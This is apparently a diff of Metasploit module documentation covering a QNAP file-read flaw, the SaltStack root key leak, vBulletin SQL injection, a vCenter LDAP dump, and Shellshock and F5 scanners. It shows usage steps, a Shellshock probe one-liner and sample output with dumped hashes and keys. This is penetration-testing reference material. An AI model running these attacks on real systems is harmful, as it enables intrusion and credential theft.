||||
|
||||
1. Start `msfconsole`
|
||||
2. Do: `use auxiliary/gather/qnap_lfi`
|
||||
3. Do: `set RHOSTS [RHOSTS]`
|
||||
4. Do: `check`
|
||||
5. Verify if `check` detects vulnerable hosts as it should
|
||||
6. Do: `run`
|
||||
7. Do: `loot`
|
||||
8. Verify if the run command retrieved the content of /etc/shadow if the host was vulnerable, and saved the file in the loot
|
||||
9. Do: `creds`
|
||||
10. Verify if the retrieved hashes were saved in the creds, and their hash type identified correctly.
|
||||
|
||||
## Options
|
||||
|
||||
### FILEPATH
|
||||
|
||||
Set this to the file you want to dump. The default is `/etc/shadow`.
|
||||
|
||||
### PRINT
|
||||
|
||||
Whether to print file contents to the screen, defaults to true.
|
||||
|
||||
## Scenarios
|
||||
|
||||
### QNAP QTS 4.3.3
|
||||
|
||||
#### Dumping hashes from `/etc/shadow`
|
||||
|
||||
```
|
||||
msf5 auxiliary(gather/qnap_lfi) > run
|
||||
[*] Running module against [REDACTED]
|
||||
|
||||
[*] Getting the Album Id
|
||||
[+] Got Album Id : cJinsP
|
||||
[*] Getting the Access Code
|
||||
[+] Got Access Code : NjU1MzR8MXwxNTkwNjk0MDIy
|
||||
[*] Attempting Local File Inclusion
|
||||
[+] File download successful, file saved in /home/redouane/.msf4/loot/20200528212705_default_[REDACTED]_qnap.http_394810.bin
|
||||
[+] File content:
|
||||
admin:$1$$0EDxoz0B/Et7aYxLtR/Ik/:14233:0:99999:7:::
|
||||
guest:$1$$ysap7EeB9ODCrO46Psdbq/:14233:0:99999:7:::
|
||||
httpdusr:!:16923:0:99999:7:::
|
||||
Cherle:$1$$Bb3R7AIqzIemj7kGq5k/p1:16923:0:99999:7:::
|
||||
redouane:$1$$l265pXOEMo0cRDhod/Z3M1:16923:0:99999:7:::
|
||||
Test:$1$$0EDxoz0B/Et7aYxLtR/Ik/:16928:0:99999:7:::
|
||||
Merle:$1$JjtNtEJx$PMtCY0tpb2N/rjck2fHVI0:17438:0:99999:7:::
|
||||
[appuser]:!:17451:0:99999:7:::
|
||||
[sshd]:!:17637:0:99999:7:::
|
||||
a9d01ba7:$1$PKQtJPZZ$3RdJRQozKzdx1axJqP9Fe/:18405:0:99999:7:::
|
||||
[*] adding the /etc/shadow entries to the database
|
||||
[*] Auxiliary module execution completed
|
||||
msf5 auxiliary(gather/qnap_lfi) > loot
|
||||
|
||||
Loot
|
||||
====
|
||||
|
||||
host service type name content info path
|
||||
---- ------- ---- ---- ------- ---- ----
|
||||
[REDACTED] qnap.http shadow text/plain /home/redouane/.msf4/loot/20200528212705_default_[REDACTED]_qnap.http_394810.bin
|
||||
|
||||
msf5 auxiliary(gather/qnap_lfi) > creds
|
||||
Credentials
|
||||
===========
|
||||
|
||||
host origin service public private realm private_type JtR Format
|
||||
---- ------ ------- ------ ------- ----- ------------ ----------
|
||||
[REDACTED] admin $1$$0EDxoz0B/Et7aYxLtR/Ik/ Nonreplayable hash md5crypt
|
||||
[REDACTED] guest $1$$ysap7EeB9ODCrO46Psdbq/ Nonreplayable hash md5crypt
|
||||
[REDACTED] Cherle $1$$Bb3R7AIqzIemj7kGq5k/p1 Nonreplayable hash md5crypt
|
||||
[REDACTED] redouane $1$$l265pXOEMo0cRDhod/Z3M1 Nonreplayable hash md5crypt
|
||||
[REDACTED] Test $1$$0EDxoz0B/Et7aYxLtR/Ik/ Nonreplayable hash md5crypt
|
||||
[REDACTED] Merle $1$JjtNtEJx$PMtCY0tpb2N/rjck2fHVI0 Nonreplayable hash md5crypt
|
||||
[REDACTED] a9d01ba7 $1$PKQtJPZZ$3RdJRQozKzdx1axJqP9Fe/ Nonreplayable hash md5crypt
|
||||
|
||||
msf5 auxiliary(gather/qnap_lfi) >
|
||||
```
|
||||
|
||||
The hashes can be used to login from the web interface, or through ssh if it's enabled.
|
||||
|
||||
#### Dumping ssh private keys
|
||||
|
||||
```
|
||||
msf5 auxiliary(gather/qnap_lfi) > set FILEPATH /root/.ssh/id_rsa
|
||||
FILEPATH => /root/.ssh/id_rsa
|
||||
msf5 auxiliary(gather/qnap_lfi) > exploit
|
||||
[*] Running module against [redacted]
|
||||
|
||||
[*] Getting the Album Id
|
||||
[+] Got Album Id : [redacted]
|
||||
[*] Getting the Access Code
|
||||
[+] Got Access Code : [redacted]
|
||||
[*] Attempting Local File Inclusion
|
||||
[+] File download successful, file saved in /home/redouane/.msf4/loot/20200528213018_default_[redacted]_qnap.http_983860.bin
|
||||
[+] File content:
|
||||
-----BEGIN RSA PRIVATE KEY-----
|
||||
[redacted]
|
||||
-----END RSA PRIVATE KEY-----
|
||||
[*] Auxiliary module execution completed
|
||||
msf5 auxiliary(gather/qnap_lfi) >
|
||||
```
|
||||
|
||||
#### Retrieving the token, can be used to authenticate
|
||||
|
||||
```
|
||||
msf5 auxiliary(gather/qnap_lfi) > set FILEPATH /share/Multimedia/.@__thumb/ps.app.token
|
||||
FILEPATH => /share/Multimedia/.@__thumb/ps.app.token
|
||||
msf5 auxiliary(gather/qnap_lfi) > exploit
|
||||
[*] Running module against [redacted]
|
||||
|
||||
[*] Getting the Album Id
|
||||
[+] Got Album Id : [redacted]
|
||||
[*] Getting the Access Code
|
||||
[+] Got Access Code : [redacted]
|
||||
[*] Attempting Local File Inclusion
|
||||
[+] File download successful, file saved in /home/redouane/.msf4/loot/20200528213233_default_[redacted]_qnap.http_815651.bin
|
||||
[+] File content:
|
||||
[redacted]
|
||||
[*] Auxiliary module execution completed
|
||||
msf5 auxiliary(gather/qnap_lfi) >
|
||||
```
|
||||
|
||||
The token can then be used to authenticate, by sending a POST request to the uri `/cgi-bin/authLogin.cgi`, for the example above:
|
||||
|
||||
sending the POST payload: `app_token=[redacted]&app=PHOTO_STATION&auth=1`
|
||||
|
||||
This would return an `authSid`, that can be used with most endpoints that require authentication.
|
||||
|
||||
### QNAP QTS 4.3.6 with Photo Station 5.7.9
|
||||
|
||||
```
|
||||
msf5 auxiliary(gather/qnap_lfi) > show options
|
||||
|
||||
Module options (auxiliary/gather/qnap_lfi):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
DEPTH 3 yes Traversal Depth (to reach the root folder)
|
||||
FILEPATH /etc/fstab yes The file to read on the target
|
||||
PRINT true yes Whether or not to print the content of the file
|
||||
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
|
||||
RHOSTS 192.168.250.5 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
|
||||
RPORT 443 yes The target port (TCP)
|
||||
SSL true no Negotiate SSL/TLS for outgoing connections
|
||||
TARGETURI / yes The URI of the QNAP Website
|
||||
VHOST no HTTP server virtual host
|
||||
|
||||
|
||||
Auxiliary action:
|
||||
|
||||
Name Description
|
||||
---- -----------
|
||||
Download Download the file at FILEPATH
|
||||
|
||||
|
||||
msf5 auxiliary(gather/qnap_lfi) > run
|
||||
[*] Running module against 192.168.250.5
|
||||
|
||||
[*] Getting the Album Id
|
||||
[+] Got Album Id : cJinsP
|
||||
[*] Getting the Access Code
|
||||
[+] Got Access Code : MHwxfDE1OTE4MTk2NjY=
|
||||
[*] Attempting Local File Inclusion
|
||||
[+] File download successful, saved in /home/smcintyre/.msf4/loot/20200610160738_default_192.168.250.5_qnap.http_072626.txt
|
||||
[+] File content:
|
||||
# /etc/fstab: static file system information.
|
||||
#
|
||||
# <file system> <mount pt> <type> <options> <dump> <pass>
|
||||
/dev/ram / ext2 defaults 1 1
|
||||
proc /proc proc defaults 0 0
|
||||
none /dev/pts devpts gid=5,mode=620 0 0
|
||||
|
||||
[*] Auxiliary module execution completed
|
||||
msf5 auxiliary(gather/qnap_lfi) >
|
||||
```
|
||||
@@ -0,0 +1,126 @@
|
||||
## Vulnerable Application
|
||||
|
||||
### Description
|
||||
|
||||
This module exploits unauthenticated access to the `_prep_auth_info()`
|
||||
method in the SaltStack Salt master's ZeroMQ request server, for
|
||||
versions 2019.2.3 and earlier and 3000.1 and earlier, to disclose the
|
||||
root key used to authenticate administrative commands to the master.
|
||||
|
||||
VMware vRealize Operations Manager versions 7.5.0 through 8.1.0, as
|
||||
well as Cisco Modeling Labs Corporate Edition (CML) and Cisco Virtual
|
||||
Internet Routing Lab Personal Edition (VIRL-PE), for versions 1.2,
|
||||
1.3, 1.5, and 1.6 in certain configurations, are known to be affected
|
||||
by the Salt vulnerabilities.
|
||||
|
||||
Tested against SaltStack Salt 2019.2.3 and 3000.1 on Ubuntu 18.04, as
|
||||
well as Vulhub's Docker image.
|
||||
|
||||
### Setup
|
||||
|
||||
**Note:** I did the bulk of my testing after manually installing Salt in
|
||||
an [Ubuntu 18.04 VM](#using-a-virtual-machine), but the [Docker image
|
||||
from Vulhub](#using-docker) may be quicker. YMMV.
|
||||
|
||||
#### Using a virtual machine
|
||||
|
||||
1. Set up an Ubuntu 18.04 VM
|
||||
2. Browse to [SaltStack's instructions for
|
||||
Ubuntu](https://repo.saltstack.com/#ubuntu)
|
||||
3. Select `Pin to Minor Release` and change all versions to either
|
||||
**2019.2.3** or **3000.1**, depending on the version you wish to test
|
||||
4. Follow the instructions, installing only the `salt-master` and
|
||||
`salt-minion` packages necessary for testing
|
||||
5. Follow the [post-installation
|
||||
configuration](https://docs.saltstack.com/en/latest/ref/configuration/index.html)
|
||||
|
||||
You may now begin testing.
|
||||
|
||||
#### Using Docker
|
||||
|
||||
**Prerequisites:** [Docker](https://docs.docker.com/get-docker/) and
|
||||
[Docker Compose](https://docs.docker.com/compose/install/) must be
|
||||
installed first.
|
||||
|
||||
**Note:** The Salt master is already configured and running in the
|
||||
following scenario. The majority of the steps below are for configuring
|
||||
and starting the minion. Version **2019.2.3** will be used.
|
||||
|
||||
1. Run `git clone https://github.com/vulhub/vulhub`
|
||||
2. Run `cd vulhub/saltstack/CVE-2020-11651`
|
||||
3. Run `docker-compose up -d` to start the container in the background
|
||||
4. Run `docker exec -it cve-2020-11651_saltstack_1 bash` to drop to a
|
||||
root shell inside the container
|
||||
5. Run `echo $'127.0.0.1\tsalt' >> /etc/hosts` to add the master to
|
||||
`/etc/hosts` (this allows the minion to find the master)
|
||||
6. Run `salt-minion -d` to execute the minion in the background
|
||||
7. Run `salt-key -A` and accept the key for the minion
|
||||
|
||||
You may now begin testing.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
Follow [Setup](#setup) and [Scenarios](#scenarios).
|
||||
|
||||
## Actions
|
||||
|
||||
### Dump
|
||||
|
||||
This dumps the Salt master's root key by sending the `_prep_auth_info()`
|
||||
method and extracting the key from the resulting serialized auth info.
|
||||
|
||||
## Scenarios
|
||||
|
||||
### SaltStack Salt 2019.2.3 on Ubuntu 18.04
|
||||
|
||||
```
|
||||
msf5 > use auxiliary/gather/saltstack_salt_root_key
|
||||
msf5 auxiliary(gather/saltstack_salt_root_key) > options
|
||||
|
||||
Module options (auxiliary/gather/saltstack_salt_root_key):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
|
||||
RPORT 4506 yes The target port (TCP)
|
||||
|
||||
|
||||
Auxiliary action:
|
||||
|
||||
Name Description
|
||||
---- -----------
|
||||
Dump Dump root key from Salt master
|
||||
|
||||
|
||||
msf5 auxiliary(gather/saltstack_salt_root_key) > set rhosts 172.28.128.5
|
||||
rhosts => 172.28.128.5
|
||||
msf5 auxiliary(gather/saltstack_salt_root_key) > run
|
||||
[*] Running module against 172.28.128.5
|
||||
|
||||
[*] 172.28.128.5:4506 - Connecting to ZeroMQ service at 172.28.128.5:4506
|
||||
[*] 172.28.128.5:4506 - Negotiating signature
|
||||
[+] 172.28.128.5:4506 - Received valid signature: "\xFF\x00\x00\x00\x00\x00\x00\x00\x01\x7F"
|
||||
[*] 172.28.128.5:4506 - Sending identical signature
|
||||
[*] 172.28.128.5:4506 - Negotiating version
|
||||
[+] 172.28.128.5:4506 - Received compatible version: "\x03"
|
||||
[*] 172.28.128.5:4506 - Sending identical version
|
||||
[*] 172.28.128.5:4506 - Negotiating NULL security mechanism
|
||||
[+] 172.28.128.5:4506 - Received NULL security mechanism
|
||||
[*] 172.28.128.5:4506 - Sending NULL security mechanism
|
||||
[*] 172.28.128.5:4506 - Sending READY command of type REQ
|
||||
[+] 172.28.128.5:4506 - Received READY reply of type ROUTER
|
||||
[*] 172.28.128.5:4506 - Yeeting _prep_auth_info() at 172.28.128.5:4506
|
||||
[+] 172.28.128.5:4506 - Received serialized auth info
|
||||
[+] 172.28.128.5:4506 - Root key: bv2Ra72DXzkrbFVYNPHrOe9CqM2aKBdl+E46/m/kaxvDsiLxhG+0PS55u704MyOi2/PgD/EadGk=
|
||||
[*] 172.28.128.5:4506 - Disconnecting from 172.28.128.5:4506
|
||||
[*] Auxiliary module execution completed
|
||||
msf5 auxiliary(gather/saltstack_salt_root_key) > creds
|
||||
Credentials
|
||||
===========
|
||||
|
||||
host origin service public private realm private_type JtR Format
|
||||
---- ------ ------- ------ ------- ----- ------------ ----------
|
||||
172.28.128.5 172.28.128.5 4506/tcp (salt/zeromq) root bv2Ra72DXzkrbFVYNPHrOe9CqM2aKBdl+E46/m/kaxvDsiLxhG+0PS55u704MyOi2/PgD/EadGk= Password
|
||||
|
||||
msf5 auxiliary(gather/saltstack_salt_root_key) >
|
||||
```
|
||||
@@ -0,0 +1,93 @@
|
||||
## Vulnerable Application
|
||||
|
||||
[vBulletin](https://www.vbulletin.com) A popular PHP bulletin board and blog web application.
|
||||
This module has been tested successfully against vBulletin 5.6.1 running on Ubuntu Linux 19.04
|
||||
|
||||
### Description
|
||||
|
||||
This module exploits a SQL injection vulnerability present in vBulletin 5.2.0 through 5.6.1 in the
|
||||
`getIndexableContent` function. This vulnerability is triggered through the `nodeId` variable and
|
||||
can be reached through multiple paths (listed below) but is exploited in this module utilizing the
|
||||
`/ajax/api/content_infraction/getIndexableContent` path.
|
||||
|
||||
- /ajax/api/content_video/getIndexableContent
|
||||
- /ajax/api/content_text/getIndexableContent
|
||||
- /ajax/api/content_report/getIndexableContent
|
||||
- /ajax/api/content_redirect/getIndexableContent
|
||||
- /ajax/api/content_privatemessage/getIndexableContent
|
||||
- /ajax/api/content_poll/getIndexableContent
|
||||
- /ajax/api/content_photo/getIndexableContent
|
||||
- /ajax/api/content_link/getIndexableContent
|
||||
- /ajax/api/content_infraction/getIndexableContent
|
||||
- /ajax/api/content_gallery/getIndexableContent
|
||||
- /ajax/api/content_event/getIndexableContent
|
||||
- /ajax/api/content_channel/getIndexableContent
|
||||
- /ajax/api/content_attach/getIndexableContent
|
||||
|
||||
Each path listed above reaches the `getIndexableContent` function within the `/core/vb/library/content.php`
|
||||
file. The SQL injection attack used utilizes a UNION query in order to leak data back in the response
|
||||
`rawtext` field. The data stored on the file system contains the entire `user` table or a dump of all the
|
||||
vBulletin tables in json format.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Do: ```use auxiliary/gather/vbulletin_getindexablecontent_sqli```
|
||||
2. Do: ```set RHOSTS [IP]```
|
||||
3. Do: ```set VHOST [HOSTNAME]```
|
||||
4. Do: ```set TARGETURI [PATH]```
|
||||
5. Do: ```run```
|
||||
|
||||
## Options
|
||||
|
||||
### NODE
|
||||
|
||||
A valid node id value for the vBulletin install. When provided, this value is used instead of that acquired
|
||||
by brute-forcing
|
||||
|
||||
### MINNODE
|
||||
|
||||
A minimum nodeid value to begin with when brute-forcing for a valid node id. **Default: 1**
|
||||
|
||||
### MAXNODE
|
||||
|
||||
A maximum nodeid value to end with when brute-forcing for a valid node id. **Default: 200**
|
||||
|
||||
### TARGETURI
|
||||
|
||||
The base URI path of vBulletin. **Default: /**
|
||||
|
||||
## Scenarios
|
||||
|
||||
```
|
||||
msf5 auxiliary(gather/vbulletin_getindexablecontent_sqli) > set RHOSTS 192.168.1.100
|
||||
RHOSTS => 192.168.1.100
|
||||
msf5 auxiliary(gather/vbulletin_getindexablecontent_sqli) > set VHOST vb.local
|
||||
VHOST => vb.local
|
||||
msf5 auxiliary(gather/vbulletin_getindexablecontent_sqli) > set TARGETURI /
|
||||
TARGETURI => /vb5
|
||||
msf5 auxiliary(gather/vbulletin_getindexablecontent_sqli) > show actions
|
||||
|
||||
Auxiliary actions:
|
||||
|
||||
Name Description
|
||||
---- -----------
|
||||
DumpAll Dump all tables used by vbulletin.
|
||||
DumpUser Dump only user table used by vbulletin.
|
||||
|
||||
msf5 auxiliary(gather/vbulletin_getindexablecontent_sqli) > run
|
||||
|
||||
[*] Running module against 192.168.1.100
|
||||
[*] Brute forcing to find a valid node id.
|
||||
[+] Sucessfully found node at id 1
|
||||
[*] Attempting to determine the vBulletin table prefix.
|
||||
[+] Sucessfully retrieved table to get prefix from vb5_language.
|
||||
[*] Getting table columns for vb5_user
|
||||
[+] Retrieved 78 columns for vb5_user
|
||||
[*] Dumping table vb5_user
|
||||
[*] Table contains 1 rows, dumping (this may take a while).
|
||||
[+] Found credential: administrator:$2y$15$I5t0BGBeYaYGbaRhhBr8g.EBax846Jx3B6ady..nwuPxOWAYicYvi (Email: zenofex@exploitee.rs)
|
||||
[+] Retrieved 1 rows for vb5_user
|
||||
[+] Saved file to: /home/zenofex/.msf4/loot/20200522180431_default_192.168.1.100_vb5_user_305077.txt
|
||||
[*] Auxiliary module execution completed
|
||||
|
||||
```
|
||||
@@ -0,0 +1,106 @@
|
||||
## Vulnerable Application
|
||||
|
||||
### Description
|
||||
|
||||
This module uses an anonymous-bind LDAP connection to dump data from
|
||||
the vmdir service in VMware vCenter Server version 6.7 prior to the
|
||||
6.7U3f update.
|
||||
|
||||
### Setup
|
||||
|
||||
Tested in the wild. No setup notes available at this time, as setup will
|
||||
be specific to target environment.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
Follow [Setup](#setup) and [Scenarios](#scenarios).
|
||||
|
||||
## Actions
|
||||
|
||||
### Dump
|
||||
|
||||
Dump all LDAP data from the vCenter Server.
|
||||
|
||||
## Options
|
||||
|
||||
### BASE_DN
|
||||
|
||||
If you already have the LDAP base DN, you may set it in this option.
|
||||
|
||||
### ConnectTimeout
|
||||
|
||||
You may configure the timeout for LDAP connects if necessary. The
|
||||
default is 10.0 seconds and should be more than sufficient.
|
||||
|
||||
## Scenarios
|
||||
|
||||
### VMware vCenter Server 6.7 virtual appliance on ESXi
|
||||
|
||||
```
|
||||
msf5 > use auxiliary/gather/vmware_vcenter_vmdir_ldap
|
||||
msf5 auxiliary(gather/vmware_vcenter_vmdir_ldap) > options
|
||||
|
||||
Module options (auxiliary/gather/vmware_vcenter_vmdir_ldap):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
BASE_DN no LDAP base DN if you already have it
|
||||
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
|
||||
RPORT 389 yes The target port
|
||||
|
||||
|
||||
Auxiliary action:
|
||||
|
||||
Name Description
|
||||
---- -----------
|
||||
Dump Dump all LDAP data
|
||||
|
||||
|
||||
msf5 auxiliary(gather/vmware_vcenter_vmdir_ldap) > set rhosts [redacted]
|
||||
rhosts => [redacted]
|
||||
msf5 auxiliary(gather/vmware_vcenter_vmdir_ldap) > run
|
||||
[*] Running module against [redacted]
|
||||
|
||||
[*] Discovering base DN automatically
|
||||
[*] Searching root DSE for base DN
|
||||
dn: cn=DSE Root
|
||||
namingcontexts: dc=vsphere,dc=local
|
||||
supportedcontrol: 1.3.6.1.4.1.4203.1.9.1.1
|
||||
supportedcontrol: 1.3.6.1.4.1.4203.1.9.1.2
|
||||
supportedcontrol: 1.3.6.1.4.1.4203.1.9.1.3
|
||||
supportedcontrol: 1.2.840.113556.1.4.417
|
||||
supportedcontrol: 1.2.840.113556.1.4.319
|
||||
supportedldapversion: 3
|
||||
supportedsaslmechanisms: GSSAPI
|
||||
|
||||
[+] Discovered base DN: dc=vsphere,dc=local
|
||||
[*] Dumping LDAP data from vmdir service at [redacted]:389
|
||||
[+] [redacted]:389 is vulnerable to CVE-2020-3952
|
||||
[*] Storing LDAP data in loot
|
||||
[+] Saved LDAP data to /Users/wvu/.msf4/loot/20200417002613_default_[redacted]_VMwarevCenterS_939568.txt
|
||||
[*] Password and lockout policy:
|
||||
dn: cn=password and lockout policy,dc=vsphere,dc=local
|
||||
cn: password and lockout policy
|
||||
enabled: TRUE
|
||||
ntsecuritydescriptor:: [redacted]
|
||||
objectclass: top
|
||||
objectclass: vmwLockoutPolicy
|
||||
objectclass: vmwPasswordPolicy
|
||||
objectclass: vmwPolicy
|
||||
vmwpasswordchangeautounlockintervalsec: [redacted]
|
||||
vmwpasswordchangefailedattemptintervalsec: [redacted]
|
||||
vmwpasswordchangemaxfailedattempts: [redacted]
|
||||
vmwpasswordlifetimedays: [redacted]
|
||||
vmwpasswordmaxidenticaladjacentchars: [redacted]
|
||||
vmwpasswordmaxlength: [redacted]
|
||||
vmwpasswordminalphabeticcount: [redacted]
|
||||
vmwpasswordminlength: [redacted]
|
||||
vmwpasswordminlowercasecount: [redacted]
|
||||
vmwpasswordminnumericcount: [redacted]
|
||||
vmwpasswordminspecialcharcount: [redacted]
|
||||
vmwpasswordminuppercasecount: [redacted]
|
||||
vmwpasswordprohibitedpreviouscount: [redacted]
|
||||
|
||||
[*] Auxiliary module execution completed
|
||||
msf5 auxiliary(gather/vmware_vcenter_vmdir_ldap) >
|
||||
```
|
||||
@@ -1,6 +1,6 @@
|
||||
## Vulnerable Application
|
||||
|
||||
More information can be found on the [Rapid7 Blog](https://community.rapid7.com/community/metasploit/blog/2010/03/08/locate-and-exploit-the-energizer-trojan).
|
||||
More information can be found on the [Rapid7 Blog](https://blog.rapid7.com/2010/03/08/locate-and-exploit-the-energizer-trojan).
|
||||
Energizer's "DUO" USB Battery Charger included a backdoor which listens on port 7777.
|
||||
|
||||
The software can be downloaded from the [Wayback Machine](http://web.archive.org/web/20080722134654/www.energizer.com/usbcharger/language/english/download.aspx).
|
||||
|
||||
@@ -0,0 +1,108 @@
|
||||
## Vulnerable Application
|
||||
|
||||
This module scans for the Shellshock vulnerability, a flaw in how the Bash shell handles external
|
||||
environment variables. This module targets CGI scripts in the Apache web server by setting
|
||||
the `HTTP_USER_AGENT` environment variable to a malicious function definition.
|
||||
|
||||
### Creating a Vulnerable Environment
|
||||
To setup an Environment that the scanner can be run against, follow the below steps to install a
|
||||
vulnerable OS and Apache version.
|
||||
|
||||
To ensure that you have a vulnerable version of bash:
|
||||
|
||||
1. Install [Ubuntu 12.04.5 LTS](http://cdimage.ubuntu.com/releases/12.04/release/)
|
||||
2. Log into console
|
||||
3. Confirm the host is vulnerable (see next section)
|
||||
4. Also install Apache2 from the apt repository with the following command
|
||||
|
||||
```
|
||||
sudo apt-get install apache2
|
||||
```
|
||||
|
||||
5. Enable cgi-mod in apache with the following command
|
||||
|
||||
```
|
||||
sudo ln -s /etc/apache2/mods-available/cgi.load /etc/apache2/mods-enabled/cgi.load
|
||||
```
|
||||
|
||||
6. Restart the apache service with the following command
|
||||
|
||||
```
|
||||
sudo service apache2 reload
|
||||
```
|
||||
|
||||
7. In your favorite text editor create a file (as root) in `/usr/lib/cgi-bin` called `test.sh` with the following contents:
|
||||
|
||||
```
|
||||
#!/bin/bash
|
||||
printf "Content-type: text/html\n\n"
|
||||
printf "Test!\n"
|
||||
```
|
||||
|
||||
8. Set the file to be executable with the following command
|
||||
|
||||
```
|
||||
sudo chmod +x /usr/lib/cgi-bin/test.sh
|
||||
```
|
||||
|
||||
### To check if a host is vulnerable to the attack
|
||||
|
||||
1. Run (on the host)
|
||||
|
||||
```
|
||||
env 'x=() { :;}; echo vulnerable' 'BASH_FUNC_x()=() { :;}; echo vulnerable' bash -c "echo test"
|
||||
```
|
||||
|
||||
2. The shell will return the below text if the environment is vulnerable
|
||||
|
||||
```
|
||||
vulnerable
|
||||
bash: BASH_FUNC_x(): line 0: syntax error near unexpected token `)'
|
||||
bash: BASH_FUNC_x(): line 0: `BASH_FUNC_x() () { :;}; echo vulnerable'
|
||||
bash: error importing function definition for `BASH_FUNC_x'
|
||||
test
|
||||
```
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Do: run `msfconsole`
|
||||
2. Do: use `auxiliary/scanner/http/apache_mod_cgi_bash_env`
|
||||
3. Do: set `RHOSTS [IP]`
|
||||
4. Do: set `TARGETURI [URI]`
|
||||
5. Do: `run`
|
||||
|
||||
## Options
|
||||
|
||||
**CMD**
|
||||
|
||||
This is the command that will be run by the scanner. The default setting is `/usr/bin/id`.
|
||||
|
||||
**CVE**
|
||||
|
||||
This is the CVE that will be used to exploit the vulnerability.
|
||||
The default setting is `CVE-2014-6271` but valid options are `CVE-2014-6271` or `CVE-2014-6278`.
|
||||
|
||||
**HEADER**
|
||||
|
||||
This is the user agent string that is sent when the module is run. The default setting is `User-Agent`.
|
||||
|
||||
**METHOD**
|
||||
|
||||
This is HTTP method used by the module. The default setting is `GET`.
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Ubuntu 12.04.5 LTS on Apache 2.2.22
|
||||
|
||||
```
|
||||
msf5 > use auxiliary/scanner/http/apache_mod_cgi_bash_env
|
||||
msf5 auxiliary(scanner/http/apache_mod_cgi_bash_env) > set RHOSTS 172.16.131.134
|
||||
RHOSTS => 172.16.131.134
|
||||
msf5 auxiliary(scanner/http/apache_mod_cgi_bash_env) > set TARGETURI /cgi-bin/test.sh
|
||||
TARGETURI => /cgi-bin/test.sh
|
||||
msf5 auxiliary(scanner/http/apache_mod_cgi_bash_env) > exploit
|
||||
|
||||
[+] uid=33(www-data) gid=33(www-data) groups=33(www-data)
|
||||
[*] Scanned 1 of 1 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed
|
||||
```
|
||||
@@ -0,0 +1,32 @@
|
||||
## Vulnerable Application
|
||||
|
||||
This module attempts to identify the web management interfaces of the following F5 Networks devices:
|
||||
|
||||
* BigIP
|
||||
* BigIQ
|
||||
* Enterprise Manager
|
||||
* ARX
|
||||
* FirePass
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Install the application/hardware
|
||||
2. Start msfconsole
|
||||
3. Do: ```use scanner/http/f5_mgmt_scanner```
|
||||
4. DO: ```set rhosts```
|
||||
5. Do: ```run```
|
||||
6. You will learn if IPs in rhosts are F5 web management interfaces
|
||||
|
||||
## Options
|
||||
|
||||
## Scenarios
|
||||
|
||||
### BigIP 15.1.0.2 Virtual-Edition
|
||||
|
||||
```
|
||||
msf5 auxiliary(scanner/http/f5_mgmt_scanner) > run
|
||||
|
||||
[+] F5 BigIP web management interface found
|
||||
[*] Scanned 1 of 1 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed
|
||||
```
|
||||
@@ -0,0 +1,141 @@
|
||||
## Vulnerable Application
|
||||
|
||||
### Description
|
||||
|
||||
This module checks to see whether or not the scanned systems return the HSTS header to enforce HSTS.
|
||||
|
||||
### Install on Ubuntu 18.04 LTS
|
||||
|
||||
sudo apt-get install apache2
|
||||
sudo service apache2 start
|
||||
sudo openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout /etc/ssl/private/apache-selfsigned.key -out /etc/ssl/certs/apache-selfsigned.crt
|
||||
sudo openssl dhparam -out /etc/ssl/certs/dhparam.pem 2048
|
||||
|
||||
Once this is done place the following content into `/etc/apache2/conf-available/ssl-params.conf`:
|
||||
|
||||
# from https://cipherli.st/
|
||||
# and https://raymii.org/s/tutorials/Strong_SSL_Security_On_Apache2.html
|
||||
|
||||
SSLCipherSuite EECDH+AESGCM:EDH+AESGCM:AES256+EECDH:AES256+EDH
|
||||
SSLProtocol All -SSLv2 -SSLv3
|
||||
SSLHonorCipherOrder On
|
||||
# Disable preloading HSTS for now. You can use the commented out header line that includes
|
||||
# the "preload" directive if you understand the implications.
|
||||
#Header always set Strict-Transport-Security "max-age=63072000; includeSubdomains; preload"
|
||||
Header always set Strict-Transport-Security "max-age=63072000; includeSubdomains"
|
||||
Header always set X-Frame-Options DENY
|
||||
Header always set X-Content-Type-Options nosniff
|
||||
# Requires Apache >= 2.4
|
||||
SSLCompression off
|
||||
SSLSessionTickets Off
|
||||
SSLUseStapling on
|
||||
SSLStaplingCache "shmcb:logs/stapling-cache(150000)"
|
||||
|
||||
SSLOpenSSLConfCmd DHParameters "/etc/ssl/certs/dhparam.pem"
|
||||
|
||||
Then execute the following:
|
||||
|
||||
sudo cp /etc/apache2/sites-available/default-ssl.conf /etc/apache2/sites-available/default-ssl.conf.bak
|
||||
|
||||
Place the following in `/etc/apache2/sites-available/default-ssl.conf`:
|
||||
|
||||
```
|
||||
<IfModule mod_ssl.c>
|
||||
<VirtualHost _default_:443>
|
||||
ServerAdmin webmaster@localhost
|
||||
|
||||
DocumentRoot /var/www/html
|
||||
|
||||
ErrorLog ${APACHE_LOG_DIR}/error.log
|
||||
CustomLog ${APACHE_LOG_DIR}/access.log combined
|
||||
|
||||
SSLEngine on
|
||||
SSLCertificateFile /etc/ssl/certs/apache-selfsigned.crt
|
||||
SSLCertificateKeyFile /etc/ssl/private/apache-selfsigned.key
|
||||
|
||||
<FilesMatch "\.(cgi|shtml|phtml|php)$">
|
||||
SSLOptions +StdEnvVars
|
||||
</FilesMatch>
|
||||
<Directory /usr/lib/cgi-bin>
|
||||
SSLOptions +StdEnvVars
|
||||
</Directory>
|
||||
|
||||
BrowserMatch "MSIE [2-6]" \
|
||||
nokeepalive ssl-unclean-shutdown \
|
||||
downgrade-1.0 force-response-1.0
|
||||
</VirtualHost>
|
||||
</IfModule>
|
||||
```
|
||||
|
||||
Place the following in `/etc/apache2/sites-available/000-default.conf`:
|
||||
|
||||
<VirtualHost *:80>
|
||||
ServerAdmin webmaster@localhost
|
||||
DocumentRoot /var/www/html
|
